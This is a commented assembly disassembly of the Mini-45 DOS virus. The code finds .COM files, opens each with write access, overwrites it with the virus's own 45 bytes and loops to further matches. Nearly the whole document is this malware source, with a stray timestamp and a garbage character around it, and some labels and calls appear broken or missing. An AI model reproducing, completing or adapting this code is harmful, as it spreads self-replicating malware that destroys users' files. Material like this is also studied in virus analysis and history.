2022-08-21 09:07:57 +00:00
|
|
|
|
;***************************************************************
|
|
|
|
|
|
; DISASSEMBLY of the MINI-45 VIRUS
|
|
|
|
|
|
;***************************************************************
|
|
|
|
|
|
; FIND .COM FILE TO INFECT
|
|
|
|
|
|
;***************************************************************
|
|
|
|
|
|
MOV DX, 127h ;filehandle search criteria-27bytes
|
|
|
|
|
|
;away from beg. of file
|
|
|
|
|
|
MOV AH, 4Eh ;setup for Dos function-find file
|
|
|
|
|
|
INT 21h ;search for first file match
|
|
|
|
|
|
JB FILESPEC ;jump below and return
|
|
|
|
|
|
;****************************************************************
|
|
|
|
|
|
; OPEN FILE
|
|
|
|
|
|
;****************************************************************
|
|
|
|
|
|
FIRST_FILE:
|
|
|
|
|
|
MOV DX, 009Eh ;pointer to asciiz file spec
|
|
|
|
|
|
MOV AX, 3D02h ;moving 3d into ah=call dos to open file
|
|
|
|
|
|
;moving 02 into al=we want read\write
|
|
|
|
|
|
;access
|
|
|
|
|
|
INT 21h ;call dos function and open file.
|
|
|
|
|
|
;file handle found is put in ax register
|
|
|
|
|
|
JB NEXT_MATCH ;search for next match
|
|
|
|
|
|
;****************************************************************
|
|
|
|
|
|
; WRITE VIRUS CODE TO FILE
|
|
|
|
|
|
;****************************************************************
|
|
|
|
|
|
XCHG AX,BX ;put retrieved file handle from 3d open
|
|
|
|
|
|
;call into bx so it can be used for
|
|
|
|
|
|
;write function.
|
|
|
|
|
|
MOV DX, 0100h ;point to buffer of data to write, i.e.
|
|
|
|
|
|
;to myself
|
|
|
|
|
|
MOV CX, 002Dh ;#of bytes to write. 45d bytes
|
|
|
|
|
|
MOV AH, 40h ;setup write to file dos function
|
|
|
|
|
|
INT 21h ;write to file indicated in bx
|
|
|
|
|
|
;******************************************************************
|
|
|
|
|
|
; CLOSE FILE
|
|
|
|
|
|
;******************************************************************
|
|
|
|
|
|
MOV AH, 3Eh ;setup for dos function to close file
|
|
|
|
|
|
INT 21h ;close file
|
|
|
|
|
|
;******************************************************************
|
|
|
|
|
|
; FIND NEXT FILE MATCH
|
|
|
|
|
|
;******************************************************************
|
|
|
|
|
|
NEXT MATCH:
|
|
|
|
|
|
MOV AH, 4Fh ;search for next file match
|
|
|
|
|
|
JMP FIRST_FILE ;return above
|
|
|
|
|
|
;******************************************************************
|
|
|
|
|
|
;
|
|
|
|
|
|
FILESPEC:
|
|
|
|
|
|
db '*.com'
|
|
|
|
|
|
db 00
|
|
|
|
|
|
|
2021-01-12 23:49:21 +00:00
|
|
|
|
�
|
